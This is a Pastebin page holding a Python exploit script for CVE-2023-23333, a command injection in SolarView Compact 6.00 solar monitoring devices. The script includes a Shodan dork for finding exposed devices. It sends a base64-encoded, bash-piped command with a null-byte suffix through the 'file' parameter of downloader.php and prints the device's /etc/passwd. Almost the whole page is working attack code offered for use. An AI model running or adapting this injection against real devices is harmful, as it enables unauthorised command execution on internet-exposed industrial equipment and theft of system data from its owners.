FlyFar

SolarView Compact 6.00 - Command Injection - CVE-2023-23333

Mar 14th, 2024
75
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.29 KB | Cybersecurity | 0 0
  1. #- Exploit Title: SolarView Compact 6.00 - Command Injection
  2. #- Shodan Dork: http.html:"solarview compact"
  3. #- Exploit Author: ByteHunter
  4. #- Email: 0xByteHunter@proton.me
  5. #- Version: 6.00
  6. #- Tested on: 6.00
  7. #- CVE : CVE-2023-23333
  8.  
  9.  
  10. import argparse
  11. import requests
  12.  
  13. def vuln_check(ip_address, port):
  14.     url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip"
  15.     response = requests.get(url)
  16.     if response.status_code == 200:
  17.         output = response.text
  18.         if "root" in output:
  19.             print("Vulnerability detected: Command Injection possible.")
  20.             print(f"passwd file content:\n{response.text}")
  21.  
  22.  
  23.         else:
  24.             print("No vulnerability detected.")
  25.     else:
  26.         print("Error: Unable to fetch response.")
  27.  
  28. def main():
  29.     parser = argparse.ArgumentParser(description="SolarView Compact Command Injection ")
  30.     parser.add_argument("-i", "--ip", help="IP address of the target device", required=True)
  31.     parser.add_argument("-p", "--port", help="Port of the the target device (default: 80)", default=80, type=int)
  32.     args = parser.parse_args()
  33.    
  34.     ip_address = args.ip
  35.     port = args.port
  36.     vuln_check(ip_address, port)
  37.  
  38. if __name__ == "__main__":
  39.     main()
  40.            
Add Comment
Please, Sign In to add comment